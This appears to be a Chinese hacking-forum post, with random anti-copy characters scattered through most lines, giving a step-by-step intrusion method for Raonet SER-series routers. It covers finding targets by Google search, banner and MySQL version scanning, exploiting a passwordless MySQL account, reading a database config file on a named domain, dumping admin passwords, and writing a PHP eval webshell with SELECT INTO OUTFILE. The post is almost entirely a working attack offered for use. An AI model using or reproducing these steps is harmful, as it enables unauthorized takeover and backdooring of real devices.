寻找存在漏洞的路由器方法:
8 Q4 ?, N1 k- G6 ^# ~6 N8 |& `
1:google搜索'Raonet Subscriber Ethernet Router') J' c, y% z6 F$ ^
( ^/ I; `) d5 i: ~1 h2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 @% H7 P& n2 N {* ?; j
8 q% l: o; l* ]. l3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
+ N0 `# e) x5 ?4 n7 c2 T* \3 x1 b( ?$ u4 ] j
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 Q0 H- J) Z2 ^ Z: t" l# f9 ^
, p. }. z- B1 L, V* Z# @+ {9 H
6 y" ^9 ^1 K( J% |' O4 J @" W9 M' i* G
入侵步骤:9 f6 |7 J9 N k& I0 `
; ?. _# d$ q3 n* c6 b( v: t1 c1 ~
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 F- |; W. f& Q r4 q' k7 m( Y4 v' r6 ]6 ^
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
! Z8 r8 `" r) [+ j0 O) K' |: f3:得到密码后连接,查看GUI管理密码:
) ~0 N$ B& I+ f9 P$ z6 luse ser_500
+ H, U# `' F4 o4 Oselect id,passwd from user;5 c& @2 ]9 p! s
4:通过数据库写入webshell,执行命令:
7 `+ v" K' G! F/ Puse mysql;- ^, {* o5 j7 j9 y
create table ok(cmd TEXT);
, I0 H/ K! |% x1 Kinsert into ok values("<?php @eval($_POST[cmd])?>");5 T$ _6 N9 R" `2 C5 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 L8 N+ x0 w& u% Cdrop table ok;
! I$ O" l& }4 z' s0 N; X$ a; v: N* m
5:连接后门shell.php
9 e# [4 W# Y* S* W1 a9 o; ^
) O! |# }9 p" E0 I# V6. 搞定!
o- q2 U' b! {$ y. u
5 T9 z% L9 U6 u: y |